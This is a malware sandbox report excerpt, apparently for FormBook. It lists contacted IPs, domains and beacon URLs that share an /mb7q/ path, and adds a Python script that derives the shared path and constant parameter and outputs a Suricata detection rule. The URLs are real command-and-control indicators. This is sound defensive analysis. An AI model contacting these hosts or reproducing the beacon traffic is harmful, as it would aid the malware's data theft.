81.88.57.70 | onstatic-pt.setupdns.net | Italy | 39729 | REGISTER-ASIT | true
198.185.159.144 | ext-sq.squarespace.com | United States | 53831 | SQUARESPACEUS | false
34.102.136.180 | helpmewithmyenergy.com | United States | 15169 | GOOGLEUS | false
185.199.108.153 | pradnyanamaya.github.io | Netherlands | 54113 | FASTLYUS | true
85.17.172.1 | thelandcle.com | Netherlands | 60781 | LEASEWEB-NL-AMS-01NetherlandsNL | true
104.21.56.119 | unknown | United States | 13335 | CLOUDFLARENETUS | false
52.15.160.167 | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false

Contacted Domains

Name | IP | Active
onstatic-pt.setupdns.net | 81.88.57.70 | true
thelandcle.com | 85.17.172.1 | true
helpmewithmyenergy.com | 34.102.136.180 | true
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | 3.223.115.185 | true
softballlyfe.com | 34.102.136.180 | true
www.szmsbk.com | 154.210.110.99 | true
tuyensinhhaiphong.com | 123.31.43.181 | true
accessibleageing.com | 166.62.28.107 | true
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 52.15.160.167 | true
pradnyanamaya.github.io | 185.199.108.153 | true
myliverpoolnews.cf | 172.67.150.212 | true
bookitstaugustine.com | 34.102.136.180 | true
ext-sq.squarespace.com | 198.185.159.144 | true
merkuryindustries.com | 34.102.136.180 | true
www.belatopapparel.xyz | 172.67.132.70 | true
www.bookitstaugustine.com | unknown | unknown
www.helpmewithmyenergy.com | unknown | unknown
www.hepimizdostuz.com | unknown | unknown
www.merkuryindustries.com | unknown | unknown
www.pradnyanamaya.com | unknown | unknown
www.hnchotels.com | unknown | unknown
www.softballlyfe.com | unknown | unknown
www.accessibleageing.com | unknown | unknown
www.thelandcle.com | unknown | unknown
www.beyju.store | unknown | unknown
www.theskineditco.com | unknown | unknown
www.tuyensinhhaiphong.com | unknown | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.belatopapparel.xyz/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ | true | Avira URL Cloud: safe | unknown
http://www.bookitstaugustine.com/mb7q/?yN60IZO0=Eg9LmWGI0Oet516AxmsZzIGWmok4sinlIPDI718HGBMEwpQyo+2kUwjDddaGIg2fHcAS&1bhta6=SXxhAn0Xl | false | Avira URL Cloud: safe | unknown
http://www.theskineditco.com/mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl | true | Avira URL Cloud: safe | unknown
www.hnchotels.com/mb7q/ | true | Avira URL Cloud: safe | low
http://www.szmsbk.com/mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl | true | Avira URL Cloud: safe | unknown
http://www.softballlyfe.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=ldDnDUdezTC7tPBp0C9FWPT+aIOp+kECAuOoWXdVRcKkjwO3/Dyrm4T044WIDM2icpCp | false | Avira URL Cloud: safe | unknown
http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html | false | Avira URL Cloud: safe | unknown
http://www.accessibleageing.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=sq+DyRr6NuP6fKntU6mt8VYgVZP7tC1pT82Xrdht1pAEghqPgbO+4msYNeCB8xB+bsnr | true | Avira URL Cloud: safe | unknown
http://www.pradnyanamaya.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=YnLga1qUVPXAwXm8Xnef5U/tzJanlVt5XSiXVkHKK7yNMqf2xcLe6bk7VgYZWvBkjWWZ | true | Avira URL Cloud: safe | unknown
http://www.merkuryindustries.com/mb7q/?yN60IZO0=a++sXVDjlFcB+laA3tgwrXcpuU3gANSGBltEKWMQhUjV/pCI9+JHBzUzdG3AEbQkWVAu&1bhta6=SXxhAn0Xl | false | Avira URL Cloud: safe | unknown
http://www.helpmewithmyenergy.com/mb7q/?yN60IZO0=JkR/9GwueQDu2AwlHCPTEGTZaRQMZ19kAB6Pon410vUfaRtwZx2A0sBIx1wpZTt7VNCf&1bhta6=SXxhAn0Xl | false | Avira URL Cloud: safe | unknown
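Every beacon URL above except the myliverpoolnews.cf page shares one path (/mb7q/) and one query parameter whose value never changes, while Avira URL Cloud rates all of them safe; the reusable detection here is therefore the beacon pattern, not URL reputation. The Python below is an added example, not part of the report or of the sandbox's tooling. It parses the URLs copied from the table, derives the shared path and the constant parameter from them, and renders both as a Suricata rule; the Suricata sticky-buffer rule syntax and the sid value are assumptions to adapt to your sensor.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# URLs exactly as printed in the "Contacted URLs" table of this report.
CONTACTED_URLS = [
    "http://www.belatopapparel.xyz/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ",
    "http://www.bookitstaugustine.com/mb7q/?yN60IZO0=Eg9LmWGI0Oet516AxmsZzIGWmok4sinlIPDI718HGBMEwpQyo+2kUwjDddaGIg2fHcAS&1bhta6=SXxhAn0Xl",
    "http://www.theskineditco.com/mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl",
    "www.hnchotels.com/mb7q/",
    "http://www.szmsbk.com/mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl",
    "http://www.softballlyfe.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=ldDnDUdezTC7tPBp0C9FWPT+aIOp+kECAuOoWXdVRcKkjwO3/Dyrm4T044WIDM2icpCp",
    "http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html",
    "http://www.accessibleageing.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=sq+DyRr6NuP6fKntU6mt8VYgVZP7tC1pT82Xrdht1pAEghqPgbO+4msYNeCB8xB+bsnr",
    "http://www.pradnyanamaya.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=YnLga1qUVPXAwXm8Xnef5U/tzJanlVt5XSiXVkHKK7yNMqf2xcLe6bk7VgYZWvBkjWWZ",
    "http://www.merkuryindustries.com/mb7q/?yN60IZO0=a++sXVDjlFcB+laA3tgwrXcpuU3gANSGBltEKWMQhUjV/pCI9+JHBzUzdG3AEbQkWVAu&1bhta6=SXxhAn0Xl",
    "http://www.helpmewithmyenergy.com/mb7q/?yN60IZO0=JkR/9GwueQDu2AwlHCPTEGTZaRQMZ19kAB6Pon410vUfaRtwZx2A0sBIx1wpZTt7VNCf&1bhta6=SXxhAn0Xl",
]


def split_beacon(url):
    """Return (host, path, params). The query is split by hand so that '+' and '/'
    inside the base64-like values survive byte for byte (parse_qsl would turn
    '+' into a space and corrupt the value)."""
    if "://" not in url:            # the report prints one URL without a scheme
        url = "http://" + url
    parts = urlsplit(url)
    params = {}
    for pair in parts.query.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            params[key] = value
    return parts.hostname, parts.path, params


def hosts_by_path(urls):
    """Map each request path to the sorted list of distinct hosts contacted with it."""
    out = defaultdict(set)
    for url in urls:
        host, path, _ = split_beacon(url)
        out[path].add(host)
    return {path: sorted(hosts) for path, hosts in out.items()}


def constant_params(urls):
    """Query keys whose value is identical in every URL that carries them."""
    seen = defaultdict(set)
    for url in urls:
        for key, value in split_beacon(url)[2].items():
            seen[key].add(value)
    return {key: next(iter(vals)) for key, vals in seen.items() if len(vals) == 1}


def c2_path(urls):
    """The path shared by the most hosts: the beacon path reused across the
    configured host list, as the table above shows for /mb7q/."""
    by_path = hosts_by_path(urls)
    return max(by_path, key=lambda path: len(by_path[path]))


def suricata_rule(path, key, value, sid):
    """Assumed Suricata sticky-buffer syntax; sid is a placeholder."""
    return (
        'alert http $HOME_NET any -> $EXTERNAL_NET any ('
        f'msg:"FormBook beacon path {path} with constant key {key}"; '
        'flow:established,to_server; '
        f'http.uri; content:"{path}"; '
        f'http.uri; content:"{key}={value}"; '
        f'classtype:trojan-activity; sid:{sid}; rev:1;)'
    )


if __name__ == "__main__":
    path = c2_path(CONTACTED_URLS)
    print("shared beacon path:", path)
    print("hosts:", ", ".join(hosts_by_path(CONTACTED_URLS)[path]))
    for key, value in constant_params(CONTACTED_URLS).items():
        print(suricata_rule(path, key, value, sid=1000001))
```

Matching on the constant key=value pair keeps the rule tight; matching on the path alone would also fire on the decoy-looking hosts that share /mb7q/ but were not marked malicious in the table, which may or may not be what you want.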